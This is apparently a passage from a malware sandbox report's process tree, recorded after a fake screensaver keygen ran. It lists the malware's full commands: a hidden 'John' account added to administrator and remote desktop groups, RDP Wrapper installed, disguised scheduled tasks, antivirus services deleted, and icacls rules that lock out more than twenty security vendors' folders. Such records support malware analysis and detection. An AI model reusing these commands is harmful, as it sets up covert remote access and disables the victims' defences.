10⤵
PID:3960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
11⤵
PID:2368

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
10⤵
PID:1332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
11⤵
PID:5664

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
10⤵
PID:5760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
11⤵
PID:5784

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
10⤵
PID:4208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
11⤵
PID:2004

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
PID:996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
11⤵
PID:5416

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
10⤵
PID:1376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
11⤵
PID:3048

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
10⤵
PID:4672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
11⤵
PID:1420

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
10⤵
PID:888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
11⤵
PID:1860

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:2180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
11⤵
PID:6132

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
10⤵
PID:5136

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
10⤵
PID:4928

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
10⤵
PID:1004

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
10⤵
PID:3620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
11⤵
PID:5756

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
10⤵
- Views/modifies file attributes
PID:3248

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
10⤵
- Views/modifies file attributes
PID:3640

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
10⤵
- Views/modifies file attributes
PID:2576

C:\Windows\SysWOW64\timeout.exe
timeout 2
8⤵
- Delays execution with timeout.exe
PID:4708

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\H.bat
5⤵
- Drops file in Drivers directory
PID:3692

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
5⤵
- Creates scheduled task(s)
PID:1528

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
5⤵
- Creates scheduled task(s)
PID:3908

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
5⤵
- Creates scheduled task(s)
PID:2164

C:\ProgramData\WindowsTask\update.exe
C:\ProgramData\WindowsTask\update.exe
5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4948

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:1036

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:1636

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:1520

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:1416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
3⤵
PID:1516

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
4⤵
PID:2144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
3⤵
PID:2060

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
4⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
3⤵
PID:2172

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
4⤵
PID:2248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
3⤵
PID:2304

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
4⤵
PID:2404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
3⤵
PID:2412

C:\Windows\SysWOW64\sc.exe
sc delete swprv
4⤵
PID:2620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
3⤵
PID:2652

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
4⤵
PID:2860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
3⤵
PID:2844

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
4⤵
PID:2064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
3⤵
PID:2080

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
4⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
3⤵
PID:2560

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
4⤵
PID:1920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
3⤵
PID:2692

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
4⤵
PID:3028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
3⤵
PID:2308

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
4⤵
PID:2952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
3⤵
PID:2868

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
4⤵
PID:2948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
3⤵
PID:2528

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
4⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
3⤵
PID:3012

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
4⤵
PID:3008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
3⤵
PID:3056

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
4⤵
PID:600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
3⤵
PID:3032

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
3⤵
PID:2760

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
3⤵
PID:1332

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
3⤵
PID:284

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
3⤵
PID:2076

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
3⤵
PID:1688

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
3⤵
PID:2256

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
3⤵
PID:2716

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
3⤵
PID:1644

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
3⤵
PID:2740

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
3⤵
PID:2476

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
3⤵
PID:2764

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
3⤵
PID:2104

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
4⤵
- Modifies file permissions
PID:1752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
3⤵
PID:552

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
4⤵
- Modifies file permissions
PID:2588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
3⤵
PID:1688

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
4⤵
- Modifies file permissions
PID:2988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
3⤵
PID:2904

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
4⤵
- Modifies file permissions
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
3⤵
PID:800

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
3⤵
PID:2864

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
3⤵
PID:2552

C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
3⤵
PID:2800

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
3⤵
PID:2084

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
3⤵
PID:1688

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
3⤵
PID:1376

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
3⤵
PID:1076

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
3⤵
PID:1840

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
3⤵
PID:1604

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
3⤵
PID:2084

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
3⤵
PID:2196

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
3⤵
PID:1376

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
3⤵
PID:2212

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
3⤵
PID:2976

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
3⤵
PID:1976

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
3⤵
PID:1084

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
3⤵
PID:1376

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
3⤵
PID:1848

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
3⤵
PID:2396

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
PID:3000

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
3⤵
PID:3188

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
3⤵
PID:3204

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
3⤵
PID:3244

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
PID:3284

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
3⤵
PID:3360

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
PID:3504

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
3⤵
PID:3684

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
3⤵
PID:3776

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
3⤵
PID:3876

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
3⤵
PID:3968

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
3⤵
PID:4056

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:4080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
3⤵
PID:1160

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
3⤵
PID:3200

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
3⤵
PID:3296

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
3⤵
PID:3768

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
3⤵
PID:368

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
3⤵
PID:1520

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
3⤵
PID:3188

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
3⤵
PID:3168

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3724

C:\Programdata\Install\utorrent.exe
C:\Programdata\Install\utorrent.exe
3⤵
- NTFS ADS
PID:3920

C:\ProgramData\WindowsTask\azur.exe
C:\ProgramData\WindowsTask\azur.exe
4⤵
- Checks processor information in registry
PID:4724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
5⤵
PID:1172

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
6⤵
- Delays execution with timeout.exe
PID:2524

C:\ProgramData\WindowsTask\system.exe
C:\ProgramData\WindowsTask\system.exe
4⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\selfDel.bat" "
5⤵
PID:5880

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
4⤵
- Modifies WinLogon
PID:2968

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
5⤵
PID:1192

C:\ProgramData\RealtekHD\taskhost.exe
C:\ProgramData\RealtekHD\taskhost.exe
3⤵
PID:5440

C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
3⤵
PID:5396

C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
"C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"
2⤵
- Executes dropped EXE
PID:1116

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
3⤵
- Loads dropped DLL
PID:2328

C:\Users\Admin\AppData\Local\Temp\RarSFX3\intro.exe
intro.exe 1O5ZF
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2552

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
4⤵
- Executes dropped EXE
- Loads dropped DLL
